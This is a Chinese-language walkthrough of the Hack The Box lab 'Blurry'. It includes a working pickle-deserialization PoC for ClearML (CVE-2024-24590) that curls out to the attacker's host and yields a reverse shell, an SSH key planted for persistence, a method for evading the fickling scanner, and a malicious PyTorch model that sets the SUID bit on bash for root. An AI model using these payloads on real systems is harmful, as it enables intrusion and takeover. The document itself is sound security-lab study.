Skip to content
  • 241204: Add tags.

Blurry Writeup

靶機資訊

Machine Description
Name Blurry
OS Linux
Difficulty Medium
Author C4rm3l0

情蒐 Recon

服務掃描

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.5.90
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 21:38 EST
Nmap scan report for 10.129.5.90
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.53 seconds

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ sudo nmap -p22,80 -sCV 10.129.5.90
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 21:43 EST
Nmap scan report for 10.129.5.90
Host is up (0.063s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

掃完標的發現開啟兩個port,分別是SSH和HTTP,系統是Debian,Web是用Nginx反向代理服務,並把IP直連的流量導向:app.blurry.htb,於是把域名加入到/etc/hosts中。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ echo "10.129.5.90 blurry.htb app.blurry.htb" | sudo tee -a /etc/hosts
10.129.5.90 blurry.htb app.blurry.htb

在瀏覽網頁前,先連看看沒有子網域的網址,發現Nginx還是導向app.blurry.htb

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ curl -svI -o /dev/null http://blurry.htb
* Host blurry.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.129.5.90
*   Trying 10.129.5.90:80...
* Connected to blurry.htb (10.129.5.90) port 80
* using HTTP/1.x
> HEAD / HTTP/1.1
> Host: blurry.htb
> User-Agent: curl/8.11.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.18.0
< Date: Tue, 03 Dec 2024 03:02:04 GMT
< Content-Type: text/html
< Content-Length: 169
< Connection: keep-alive
< Location: http://app.blurry.htb/
<
* Connection #0 to host blurry.htb left intact

HTTP - app.blurry.htb

連至首頁,架有開源專案ClearML,當要嘗試輸入"Full Name"欄位時跳出除了預設使用者之外三個名稱,分別是:

  • Chad Jippity
  • Ray Flection
  • Car Melo

於是先選擇Default User,進入ClearML點選"Getting Started",跳出如何安裝與使用ClearML的方式,於是先安裝工具,安裝好之後點選"CREATE NEW CREDENTIALS"",但是沒辦法生成,所以先換成Ray Flection的帳號逛逛,發現點選右上角人像,進入"Setting > Workspace > + Create new credentials",生成新的金鑰,並加入到本機的設定中。

在本機設定ClearML:

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ uv tool install clearml
...
Installed 4 executables: clearml-data, clearml-init, clearml-param-search, clearml-task

┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ clearml-init
/home/kali/.local/share/uv/tools/clearml/lib/python3.12/site-packages/clearml/task.py:258: SyntaxWarning: invalid escape sequence '\<'
  """
/home/kali/.local/share/uv/tools/clearml/lib/python3.12/site-packages/clearml/storage/manager.py:217: SyntaxWarning: invalid escape sequence '\~'
  """
ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:
api {
    web_server: http://app.blurry.htb
    api_server: http://api.blurry.htb
    files_server: http://files.blurry.htb
    credentials {
        "access_key" = "80OD10WLSCJZEOYVN2J1"
        "secret_key"  = "yr0iDqhniWGrG85HonblNikDbeh3nAHg0h3hpXHCQ09BMzdiTc"
    }
}
Detected credentials key="80OD10WLSCJZEOYVN2J1" secret="yr0i***"

ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb

Verifying credentials ...
Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NameResolutionError("<urllib3.connection.HTTPConnection object at 0x7f3a0a1dbc80>: Failed to resolve 'api.blurry.htb' ([Errno -2] Name or service not known)")': /auth.login
Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NameResolutionError("<urllib3.connection.HTTPConnection object at 0x7f3a0a1d8ec0>: Failed to resolve 'api.blurry.htb' ([Errno -2] Name or service not known)")': /auth.login
Error: could not verify credentials: key=80OD10WLSCJZEOYVN2J1 secret=yr0iDqhniWGrG85HonblNikDbeh3nAHg0h3hpXHCQ09BMzdiTc
...

過程中發現兩個新的子網域:api.blurry.htbfiles.blurry.htb,但是因為還沒被加入到/etc/hosts裡,所以工具不知道這兩個網址指向哪裡,因此先加入到hosts檔裡,在再設定一次。

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ cat /etc/hosts
...
10.129.5.90 blurry.htb app.blurry.htb api.blurry.htb files.blurry.htb

┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ clearml-init
ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:
api {
    web_server: http://app.blurry.htb
    api_server: http://api.blurry.htb
    files_server: http://files.blurry.htb
    credentials {
        "access_key" = "80OD10WLSCJZEOYVN2J1"
        "secret_key"  = "yr0iDqhniWGrG85HonblNikDbeh3nAHg0h3hpXHCQ09BMzdiTc"
    }
}
Detected credentials key="80OD10WLSCJZEOYVN2J1" secret="yr0i***"

ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb

Verifying credentials ...
Credentials verified!

New configuration stored in /home/kali/clearml.conf
ClearML setup completed successfully.

設定成功。
但目前不知道要怎麼使用ClearML,於是打算先掃掃看有沒有其他子網域,畢竟已經發現三個了,也許還有還沒蒐集完的也說不定,外加靶機的架有Nginx,所以有其他的vHost(站點)的機會也不低,如果沒有找到新的子網域,就開始找ClearML的弱點。

子網域詳列

掃完發現新站點:char.blurry.htb

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ ffuf -u http://10.129.5.90 -H "Host: FUZZ.blurry.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fc 301

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.5.90
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.blurry.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

app                     [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 71ms]
files                   [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 1962ms]
chat                    [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 160ms]
:: Progress: [114441/114441] :: Job [1/1] :: 641 req/sec :: Duration: [0:03:06] :: Errors: 0 :

於是將它加入/etc/hosts中。

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ cat /etc/hosts
...
10.129.5.90 blurry.htb app.blurry.htb api.blurry.htb files.blurry.htb chat.blurry.htb

HTTP - chat.blurry.htb

連線首頁是一個開源聊天平台,Rocket.Chat,但目前不能登入。

ClearML

回連到ClearML,發現首頁顯示出最近一項專案「Black Swan」,點入再切到EXPERIMENTS分頁,得知Chad Jippity每幾分鐘就會執行一次「Review JSON Artifacts」。

點擊該項Job,進到該項task得知,其實是Chad Jippity每幾分鐘執行一次review_tasks.py

大至閱讀review_tasks.py內容得知,該腳本會嘗試取得所有被有被標記 "review" 的task下的 "Artifacts"

Artifacts1 are objects associated with ClearML tasks that are logged to ClearML, so they can later be easily accessed, modified, and used.
簡單來說,artifacts就是用來儲存modules或是task相關的objects的物件。

#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

def process_json_artifact(data, artifact_name):
    """
    Process a JSON artifact represented as a Python dictionary.
    Print all key-value pairs contained in the dictionary.
    """
    print(f"[+] Artifact '{artifact_name}' Contents:")
    for key, value in data.items():
        print(f" - {key}: {value}")

def process_task(task):
    artifacts = task.artifacts

    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get()

        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")

def main():
    review_task = Task.init(project_name="Black Swan", 
                            task_name="Review JSON Artifacts", 
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return

    threads = []
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)
...
if __name__ == "__main__":
    main()
    cleanup()

CVE-2024-24590

直接上網搜尋:「clearml artifact exploit」,就會找到答案是CVE-2024-24590。 現在大可以直接利用公開在GitHub上PoC打進去,但這樣就不好玩了,畢竟是開源專案,還是想看一下到底發生了什麼事。

請參考HiddenLayer研究報告中的詳細漏洞複現步驟和ClearML介紹。

了解Pickle反序列化弱點

從ClearML的點擊右上角頭像,在進入"Profile",可在右下角得知系統版本:「 WebApp: 1.13.1-426 • Server: 1.13.1-426 • API: 2.27 」,因此前往對應版本的頁面,並觀察artifacts.py

在原始碼的最上方得知artifacts.py使用picklepickle是Python中的模組之一,功能是提供Python物件(反)序列化的protocols,但是pickle的反序列化功能不安全,攻擊者可以鍛造惡意pickle data導致在unpicking(pickle.loads()2)執行任意程式碼。

import gzip
import io
import json
import yaml
import mimetypes
import os
import pickle
from six.moves.urllib.parse import quote
from copy import deepcopy
from datetime import datetime
from multiprocessing.pool import ThreadPool
from tempfile import mkdtemp, mkstemp
from threading import Thread
from time import time
from zipfile import ZipFile, ZIP_DEFLATED

review_tasks.py中,為了取得artifact的資料,使用data = artifact_object.get(),因此從artifacts.py往下看,尋找class Artifact(object)get function,因此找到def get(self, force_download=False, deserialization_function=None)的區塊,並尤其針對對pickel的部分分析。

def get(self, force_download=False, deserialization_function=None):
...
    if self._object is not self._not_set:
        return self._object

    local_file = self.get_local_copy(raise_on_error=True, force_download=force_download)

    # noinspection PyBroadException
    try:
        if deserialization_function:
            with open(local_file, "rb") as f:
                self._object = deserialization_function(f.read())
    ...
        elif self.type == "image":
            self._object = Image.open(local_file)
        elif self.type == "JSON" or self.type == "dict":
            with open(local_file, "rt") as f:
                if self.type == "JSON" or self._content_type == "application/json":
                    self._object = json.load(f)
                else:
                    self._object = yaml.safe_load(f)
        elif self.type == "string":
            with open(local_file, "rt") as f:
                self._object = f.read()
        elif self.type == "pickle":
            with open(local_file, "rb") as f:
                self._object = pickle.load(f)
    except Exception as e:
        LoggerRoot.get_base_logger().warning(
            "Exception '{}' encountered when getting artifact with type {} and content type {}".format(
                e, self.type, self._content_type
            )
        )

由原始碼可知,當要取得artifacts的資料時,函數的邏輯先判斷讀取的資料類型,如果類型是pickle就直接pickel.load(),如果我們能操控local_file,就可以執行任意程式碼。

接下來再看v1.14.3rc0版本的修正commit,修復漏洞的方法是在將資料丟給pickle之前,先檢查目前artifacts檔案的hash值,如果該hash和原始檔的hash不同,就代表者artifacts被改寫了。

        elif self.type == "image":
            self._object = Image.open(local_file)
        elif self.type == "JSON" or self.type == "dict":
            with open(local_file, "rt") as f:
                if self.type == "JSON" or self._content_type == "application/json":
                    self._object = json.load(f)
                else:
                    self._object = yaml.safe_load(f)
        elif self.type == "string":
            with open(local_file, "rt") as f:
                self._object = f.read()
        elif self.type == "pickle":
            if self.hash:
                file_hash, _ = sha256sum(local_file, block_size=Artifacts._hash_block_size)
                if self.hash != file_hash:
                    raise Exception("incorrect pickle file hash, artifact file might be corrupted")
            with open(local_file, "rb") as f:
                self._object = pickle.load(f)
    except Exception as e:
        LoggerRoot.get_base_logger().warning(
            "Exception '{}' encountered when getting artifact with type {} and content type {}".format(
                e, self.type, self._content_type
            )
        )

人工製造Payload

雖然剛才一直稱「Review JSON Artifacts」等項目為"Task",但那些其實ClearML的"Experiments",而每一個experiment底下可以有多個task,可以參考官方的教學影片3上傳一個experiment。
(clearml-init的CLI設定在最一開始就已經完成,所以不再贅述。)

搜尋:「clearml artifact upload」可以找到Using Artifacts的官方教學文章,說可以利用Task.upload_artifact()上傳artifacts,為了強制ClearML使用pickle,將auto_pickle設定為True4,再加上pickle payload5,就可以產生以下PoC。

#!/usr/bin/python3

from clearml import Task
import pickle

class CMD:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://10.10.14.6:8000/qq",))

def main():
    cmd = CMD()
    task = Task.init(project_name="Black Swan", task_name="test", tags=["review"])
    res = task.upload_artifact(name="test", artifact_object=cmd, auto_pickle=True)

if __name__ == "__main__":
    main()

測試後的確看到回連我方HTTP server。

取得Reverse Shell

上傳experiment後,大概等個3分鐘有reverse shell回連了。

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/playground]
└─$ nc -lvnp 8787
listening on [any] 8787 ...

id
connect to [10.10.14.6] from (UNKNOWN) [10.129.5.90] 43824
bash: cannot set terminal process group (50361): Inappropriate ioctl for device
bash: no job control in this shell
jippity@blurry:~$
jippity@blurry:~$ id
uid=1000(jippity) gid=1000(jippity) groups=1000(jippity)
jippity@blurry:~$ cat user.txt
cat user.txt
d68f1ded19ba45f4a4987038d1089fc5

順便塞自己的SSH公鑰到~/.ssh/authorized_keys裡面,方便連線。

Terminal
jippity@blurry:~$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILrTGODhENPkBXJ9xtQwpB2jFCzO6943sy9z0szU7bji kali@kali" >>  ~/.ssh/authorized_keys

SSH登入jippity

使用SSH登入jippity,老樣子,嘗試Linux提權的其中一個路徑:sudo -l,結果發現目前可以以root權限使用/usr/bin/evaluate_model執行所有/models/底下的.pth檔,於是先看看evaluate_model是什麼檔案。

Terminal
jippity@blurry:~$ sudo -l
sudo -l
Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
jippity@blurry:~$

evaluate_model腳本分析

file告訴我們evaluate_model是一份ACSII文字執行檔,也就是腳本。

jippity@blurry:~$ file /usr/bin/evaluate_model
file /usr/bin/evaluate_model
/usr/bin/evaluate_model: Bourne-Again shell script, ASCII text executable

經過閱讀後,得知這份腳本會先過濾模組包,再決定是否執行模組,步驟大略如下:

  1. 解壓縮模組包(19-28)
  2. 依序使用fickling分析解壓縮出來的模組,也就是被pickle反序列化的.pkl檔(30-38)
  3. 如果分析結果安全,就會讓另外一個Python腳本/models/evaluate_model.py執行(43-46)
#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/opt/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi

evaluate_model.py腳本分析

接著閱讀evaluate_model.py腳本內容,發現其實是另外一個執行PyTorch模組的腳本,重要的部分是load_moduel(model_path)(29-36),這是真正執行模組的地方,並在第32行看到torch.load(model_path),至官方文件得知這是PyTorch使用pickle反序列化的函數6,且官方文件也警告該函數此使用不安全的模組pickle

import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys


class CustomCNN(nn.Module):
    def __init__(self):
        super(CustomCNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
        self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
        self.fc2 = nn.Linear(in_features=128, out_features=10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 32 * 8 * 8)
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x


def load_model(model_path):
    model = CustomCNN()

    state_dict = torch.load(model_path)
    model.load_state_dict(state_dict)

    model.eval()
    return model

def prepare_dataloader(batch_size=32):
    transform = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.RandomCrop(32, padding=4),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
    ])

    dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
    subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
    dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
    return dataloader

def evaluate_model(model, dataloader):
    correct = 0
    total = 0
    with torch.no_grad():
        for images, labels in dataloader:
            outputs = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()

    accuracy = 100 * correct / total
    print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')

def main(model_path):
    model = load_model(model_path)
    print("[+] Loaded Model.")
    dataloader = prepare_dataloader()
    print("[+] Dataloader ready. Evaluating model...")
    evaluate_model(model, dataloader)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <path_to_model.pth>")
    else:
        model_path = sys.argv[1]  # Path to the .pth file
        main(model_path)

人工製造Payload

由以上腳本份析可知,要成功提權必須達成以下幾點:

  1. 提供壓縮檔格式檔案(模組包)
  2. 規避fickling偵測
  3. 使用PyTorch模組觸發惡意pickle

fickling不良偵測機制

首先先查看fickling的版本,得知是0.1.2,於是前往對應版本的GitHub,查看原始碼。

Terminal
jippity@blurry:~$ fickling -v
fickling -v
0.1.2

analysis.py裡得知,fickling只針對eval()exec()compile()open()_run_code()execWrapper()的關鍵字過濾,所以可以放心使用os.system()

class OvertlyBadEvals(Analysis):
    def analyze(self, context: AnalysisContext) -> Iterator[AnalysisResult]:
        for node in context.pickled.properties.non_setstate_calls:
            if (
                hasattr(node.func, "id")
                and node.func.id in context.pickled.properties.likely_safe_imports
            ):
                # if the call is to a constructor of an object imported from the Python
                # standard library, it's probably okay
                continue
            shortened, already_reported = context.shorten_code(node)
            if (
                shortened.startswith("eval(")
                or shortened.startswith("exec(")
                or shortened.startswith("compile(")
                or shortened.startswith("open(")
                or shortened.startswith("_run_code(")
                or shortened.startswith("execWrapper(")
            ):
...

實際測試whoamifickling沒有顯示任何告警。

Terminal
jippity@blurry:~$ cat pickled.pkl
!posixsystemwhoamiR.jippity@blurry:~$
jippity@blurry:~$ fickling -s --json-output res.json pickled.pkl && cat res.json
jippity@blurry:~$

製造惡意PyTorch模組包

首先確認PyTorch版本,版本為2.2.0,基本上使用這之後的版本都可以。

Terminal
jippity@blurry:~$ pip list
pip list
Package                   Version
------------------------- --------------
...
torch                     2.2.0
torchvision               0.17.0
triton                    2.2.0
typing-extensions         4.9.0
urllib3                   1.26.5
wheel                     0.34.2

接下來直接上網搜尋:「pytorch model template pickle」,就會直接找到PyTorch的官方教學:「Saving and Loading Models」,於是直接把第一個範例抄下來改,加入觸發pickle__reduce__()

import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim


# Define model
class TheModelClass(nn.Module):
    def __init__(self):
        super(TheModelClass, self).__init__()
        self.conv1 = nn.Conv2d(3, 6, 5)
        self.pool = nn.MaxPool2d(2, 2)
        self.conv2 = nn.Conv2d(6, 16, 5)
        self.fc1 = nn.Linear(16 * 5 * 5, 120)
        self.fc2 = nn.Linear(120, 84)
        self.fc3 = nn.Linear(84, 10)

    def forward(self, x):
        x = self.pool(F.relu(self.conv1(x)))
        x = self.pool(F.relu(self.conv2(x)))
        x = x.view(-1, 16 * 5 * 5)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = self.fc3(x)
        return x

    def __reduce__(self):
        import os
        return (os.system, ("chmod u+s /bin/bash",))


# Initialize model
model = TheModelClass()

# Initialize optimizer
optimizer = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)

# Print model's state_dict
print("Model's state_dict:")
for param_tensor in model.state_dict():
    print(param_tensor, "\t", model.state_dict()[param_tensor].size())

# Print optimizer's state_dict
print("Optimizer's state_dict:")
for var_name in optimizer.state_dict():
    print(var_name, "\t", optimizer.state_dict()[var_name])

torch.save(model.state_dict(), "./badmodel.pth")

設定環境並執行上述腳本,以產生惡意模組包badmodel.pth,模組包其實是ZIP檔。

Terminal
test-py on  master [?] via 🐍 v3.13.0
❯ uv venv --python 3.9
Using CPython 3.9.20
Creating virtual environment at: .venv
Activate with: source .venv/bin/activate.fish

test-py on  master [?] via 🐍 v3.13.0
source .venv/bin/activate.fish

test-py on  master [?] via 🐍 v3.9.20 (test-py)
❯ uv init --no-cache
Initialized project `test-py`

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ uv add torch --no-cache
...
test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ python badtorch.py
/var/home/user/Documents/tmp/test-py/.venv/lib/python3.9/site-packages/torch/_subclasses/functional_tensor.py:295: UserWarning: Failed to initialize NumPy: No module named 'numpy' (Triggered internally at ../torch/csrc/utils/tensor_numpy.cpp:84.)
  cpu = _conversion_method_template(device=torch.device("cpu"))

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ uv add numpy
Resolved 26 packages in 525ms
Prepared 1 package in 1.24s
Installed 1 package in 12ms
 + numpy==2.0.2

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ python badtorch.py

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ file badmodel.pth
badmodel.pth: Zip archive data, at least v0.0 to extract, compression method=store

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ scp badmodel.pth [email protected]:"/home/kali/Documents/CTF/HTB/Machines/Blurry/"
[email protected]'s password:
badmodel.pth                                                                              100%  246KB 156.6MB/s   00:00

ROOTED

上傳並執行取得root權限。

Terminal
jippity@blurry:~$ cp badmodel.pth /models/
jippity@blurry:~$ sudo /usr/bin/evaluate_model /models/badmodel.pth
[+] Model /models/badmodel.pth is considered safe. Processing...
Traceback (most recent call last):
  File "/models/evaluate_model.py", line 76, in <module>
    main(model_path)
  File "/models/evaluate_model.py", line 65, in main
    model = load_model(model_path)
  File "/models/evaluate_model.py", line 33, in load_model
    model.load_state_dict(state_dict)
  File "/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py", line 2153, in load_state_dict
    raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format(
RuntimeError: Error(s) in loading state_dict for CustomCNN:
        Unexpected key(s) in state_dict: "fc3.weight", "fc3.bias".
        size mismatch for conv1.weight: copying a param with shape torch.Size([6, 3, 5, 5]) from checkpoint, the shape in current model is torch.Size([16, 3, 3, 3]).
        size mismatch for conv1.bias: copying a param with shape torch.Size([6]) from checkpoint, the shape in current model is torch.Size([16]).
        size mismatch for conv2.weight: copying a param with shape torch.Size([16, 6, 5, 5]) from checkpoint, the shape in current model is torch.Size([32, 16, 3, 3]).
        size mismatch for conv2.bias: copying a param with shape torch.Size([16]) from checkpoint, the shape in current model is torch.Size([32]).
        size mismatch for fc1.weight: copying a param with shape torch.Size([120, 400]) from checkpoint, the shape in current model is torch.Size([128, 2048]).
        size mismatch for fc1.bias: copying a param with shape torch.Size([120]) from checkpoint, the shape in current model is torch.Size([128]).
        size mismatch for fc2.weight: copying a param with shape torch.Size([84, 120]) from checkpoint, the shape in current model is torch.Size([10, 128]).
        size mismatch for fc2.bias: copying a param with shape torch.Size([84]) from checkpoint, the shape in current model is torch.Size([10]).
jippity@blurry:~$ bash -p
bash-5.1# id
uid=1000(jippity) gid=1000(jippity) euid=0(root) groups=1000(jippity)
bash-5.1# cat /root/root.txt
e55eed74ef76299b9152bb4b5d253bcf

後記

我是之後去看別人的writeup,才知道可以任意創建rocket.chat帳號登入,裡面的聊天室中有ClearML的提示。
笑死。


Last update: 2024-12-23 Created: 2024-12-03